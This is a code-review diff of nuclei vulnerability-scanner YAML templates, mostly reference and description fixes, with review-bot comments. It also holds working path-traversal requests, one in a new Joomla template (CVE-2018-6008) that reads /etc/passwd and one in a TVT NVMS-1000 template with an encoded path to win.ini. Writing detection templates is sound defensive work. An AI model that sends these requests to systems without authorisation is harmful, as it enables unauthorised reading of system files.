description: WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/
|
- https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/
|
||||||
- https://www.cvedetails.com/cve/CVE-2018-20985/
|
- https://www.cvedetails.com/cve/CVE-2018-20985/
|
||||||
severity: high
|
severity: high
|
||||||
|
|
|
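Review bot: `severity: high` sits after the `reference` list in this file, while the other templates in this commit place it directly under `author`. Since the neighbouring `reference` line is already being edited, move `severity` up so the `info` block keeps the same field order across templates. No `tags` line is visible in this hunk either, so check that one follows further down.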
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2018-6008
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Arbitrary File Download exists in the Jtag Members Directory 5.3.7 component for Joomla! via the download_file parameter.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/43913
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2018-6008
|
||||||
|
tags: cve,cve2018,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
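Review bot: the regex matcher `root:.*:0:0` uses a greedy `.*` that can run across several colon-separated fields on a line, so any line that starts with `root:` and later contains `:0:0` satisfies it. Tighten it to something like `root:[^:]*:0:0:` so only a passwd-style entry for root matches, and drop the empty line between `matchers:` and the first `- type: regex`.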
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Path Traversal vulnerability in Controllers/LetsEncryptController.cs in LetsEncryptController in GrandNode 4.40 allows remote, unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests. A patch for this issue was made on 2019-05-30 in GrandNode 4.40.
|
description: Path Traversal vulnerability in Controllers/LetsEncryptController.cs in LetsEncryptController in GrandNode 4.40 allows remote, unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests. A patch for this issue was made on 2019-05-30 in GrandNode 4.40.
|
||||||
reference: |
|
reference:
|
||||||
- https://security401.com/grandnode-path-traversal/
|
- https://security401.com/grandnode-path-traversal/
|
||||||
- https://www.cvedetails.com/cve/CVE-2019-12276
|
- https://www.cvedetails.com/cve/CVE-2019-12276
|
||||||
tags: cve,cve2019,lfi
|
tags: cve,cve2019,lfi
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Aptana Jaxer 1.0.3.4547 is vulnerable to a local file inclusion vulnerability in the wikilite source code viewer. This vulnerability allows a remote attacker to read internal files on the server via a tools/sourceViewer/index.html?filename=../ URI.
|
description: Aptana Jaxer 1.0.3.4547 is vulnerable to a local file inclusion vulnerability in the wikilite source code viewer. This vulnerability allows a remote attacker to read internal files on the server via a tools/sourceViewer/index.html?filename=../ URI.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/47214
|
- https://www.exploit-db.com/exploits/47214
|
||||||
- https://www.cvedetails.com/cve/CVE-2019-14312
|
- https://www.cvedetails.com/cve/CVE-2019-14312
|
||||||
tags: cve,cve2019,lfi
|
tags: cve,cve2019,lfi
|
||||||
|
|
|
@ -4,7 +4,7 @@ info:
|
||||||
name: WordPress Plugin UserPro 4.9.32 - Reflected Cross-Site Scripting (XSS)
|
name: WordPress Plugin UserPro 4.9.32 - Reflected Cross-Site Scripting (XSS)
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: |
|
reference:
|
||||||
- https://wpscan.com/vulnerability/9815
|
- https://wpscan.com/vulnerability/9815
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470
|
||||||
tags: cve,cve2019,wordpress,xss,wp-plugin
|
tags: cve,cve2019,wordpress,xss,wp-plugin
|
||||||
|
|
|
@ -4,8 +4,8 @@ info:
|
||||||
name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS)
|
name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS)
|
||||||
author: daffainfo,dhiyaneshDk
|
author: daffainfo,dhiyaneshDk
|
||||||
severity: medium
|
severity: medium
|
||||||
description: Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site.
|
description: The my-calendar plugin before 3.1.10 for WordPress has XSS. Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site.
|
||||||
reference: |
|
reference:
|
||||||
- https://wpscan.com/vulnerability/9267
|
- https://wpscan.com/vulnerability/9267
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-15713
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-15713
|
||||||
tags: cve,cve2019,wordpress,xss,wp-plugin
|
tags: cve,cve2019,wordpress,xss,wp-plugin
|
||||||
|
|
|
@ -4,7 +4,10 @@ info:
|
||||||
name: WordPress Plugin Download Manager 2.9.93 - Reflected Cross-Site Scripting (XSS)
|
name: WordPress Plugin Download Manager 2.9.93 - Reflected Cross-Site Scripting (XSS)
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889
|
description: The download-manager plugin before 2.9.94 for WordPress has XSS via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.
|
||||||
|
reference:
|
||||||
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889
|
||||||
|
- https://www.cybersecurity-help.cz/vdb/SB2019041819
|
||||||
tags: cve,cve2019,wordpress,xss,wp-plugin
|
tags: cve,cve2019,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS.
|
description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS.
|
||||||
reference: |
|
reference:
|
||||||
- https://plugins.trac.wordpress.org/changeset/2152730
|
- https://plugins.trac.wordpress.org/changeset/2152730
|
||||||
- https://wordpress.org/plugins/api-bearer-auth/#developers
|
- https://wordpress.org/plugins/api-bearer-auth/#developers
|
||||||
tags: cve,cve2019,wordpress,xss,wp-plugin
|
tags: cve,cve2019,wordpress,xss,wp-plugin
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: TVT NVMS-1000 devices allow GET /.. Directory Traversal
|
description: TVT NVMS-1000 devices allow GET /.. Directory Traversal
|
||||||
reference: |
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-20085
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-20085
|
||||||
- https://www.exploit-db.com/exploits/48311
|
- https://www.exploit-db.com/exploits/48311
|
||||||
tags: cve,cve2019,iot,lfi
|
tags: cve,cve2019,iot,lfi
|
||||||
|
@ -13,7 +13,7 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/../../../../../../../../../../../Windows/win.ini"
|
- "{{BaseURL}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
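Review bot: the request path now sends only the percent-encoded `..%2F` form and lower-cases `windows`, while the template's description still reads "GET /.. Directory Traversal" and the commit gives no reason for dropping the literal form. Either keep the original path as a second entry under `path:` or record in the description why the encoded form is needed, so the template and its description agree.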
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: The GraceMedia Media Player plugin 1.0 for WordPress allows Local File Inclusion via the cfg parameter.
|
description: The GraceMedia Media Player plugin 1.0 for WordPress allows Local File Inclusion via the cfg parameter.
|
||||||
reference: |
|
reference:
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
|
||||||
- https://seclists.org/fulldisclosure/2019/Mar/26
|
- https://seclists.org/fulldisclosure/2019/Mar/26
|
||||||
tags: cve,cve2019,wordpress,wp-plugin,lfi
|
tags: cve,cve2019,wordpress,wp-plugin,lfi
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: LimeSurvey before 4.1.12+200324 contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php.
|
description: LimeSurvey before 4.1.12+200324 contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/48297
|
- https://www.exploit-db.com/exploits/48297
|
||||||
- https://www.cvedetails.com/cve/CVE-2020-11455
|
- https://www.cvedetails.com/cve/CVE-2020-11455
|
||||||
tags: cve,cve2020,lfi
|
tags: cve,cve2020,lfi
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: An issue was discovered in Car Rental Management System 1.0. An unauthenticated user can perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, to cause local file inclusion resulting in code execution.
|
description: An issue was discovered in Car Rental Management System 1.0. An unauthenticated user can perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, to cause local file inclusion resulting in code execution.
|
||||||
reference: |
|
reference:
|
||||||
- https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5
|
- https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-29227
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-29227
|
||||||
tags: cve,cve2020,lfi
|
tags: cve,cve2020,lfi
|
||||||
|
|
|
@ -4,7 +4,8 @@ info:
|
||||||
name: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting (XSS)
|
name: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting (XSS)
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: |
|
description: The EventON plugin through 3.0.5 for WordPress allows addons/?q= XSS via the search field.
|
||||||
|
reference:
|
||||||
- https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS
|
- https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-29395
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-29395
|
||||||
tags: cve,cve2020,wordpress,xss,wp-plugin
|
tags: cve,cve2020,wordpress,xss,wp-plugin
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: ACS Advanced Comment System 1.0 is affected by Directory Traversal via an advanced_component_system/index.php?ACS_path=..%2f URI.
|
description: ACS Advanced Comment System 1.0 is affected by Directory Traversal via an advanced_component_system/index.php?ACS_path=..%2f URI.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/49343
|
- https://www.exploit-db.com/exploits/49343
|
||||||
- https://www.cvedetails.com/cve/CVE-2020-35598
|
- https://www.cvedetails.com/cve/CVE-2020-35598
|
||||||
tags: cve,cve2020,lfi
|
tags: cve,cve2020,lfi
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
description: MERCUSYS Mercury X18G 1.0.5 devices allow Directory Traversal via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI.
|
description: MERCUSYS Mercury X18G 1.0.5 devices allow Directory Traversal via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI.
|
||||||
reference: |
|
reference:
|
||||||
- https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md
|
- https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-23241
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-23241
|
||||||
tags: cve,cve2021,iot,lfi,router
|
tags: cve,cve2021,iot,lfi,router
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
description: The Bello - Directory & Listing WordPress theme before 1.6.0 did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameter in ints listing page, leading to reflected Cross-Site Scripting issues.
|
description: The Bello - Directory & Listing WordPress theme before 1.6.0 did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameter in ints listing page, leading to reflected Cross-Site Scripting issues.
|
||||||
reference: |
|
reference:
|
||||||
- https://m0ze.ru/vulnerability/%5B2021-03-21%5D-%5BWordPress%5D-%5BCWE-79%5D-Bello-WordPress-Theme-v1.5.9.txt
|
- https://m0ze.ru/vulnerability/%5B2021-03-21%5D-%5BWordPress%5D-%5BCWE-79%5D-Bello-WordPress-Theme-v1.5.9.txt
|
||||||
- https://wpscan.com/vulnerability/6b5b42fd-028a-4405-b027-3266058029bb
|
- https://wpscan.com/vulnerability/6b5b42fd-028a-4405-b027-3266058029bb
|
||||||
tags: cve,cve2021,wordpress,xss,wp-plugin
|
tags: cve,cve2021,wordpress,xss,wp-plugin
|
||||||
|
|
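Review bot: `tags` labels this template `wp-plugin`, but the description calls Bello a WordPress theme, and the ScoreMe theme template in this same commit uses `wp-theme`. Change the tag to `wp-theme` so tag-based selection picks it up, and fix "ints listing page" in the description to "its listing page" while the file is open.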
Some files were not shown because too many files have changed in this diff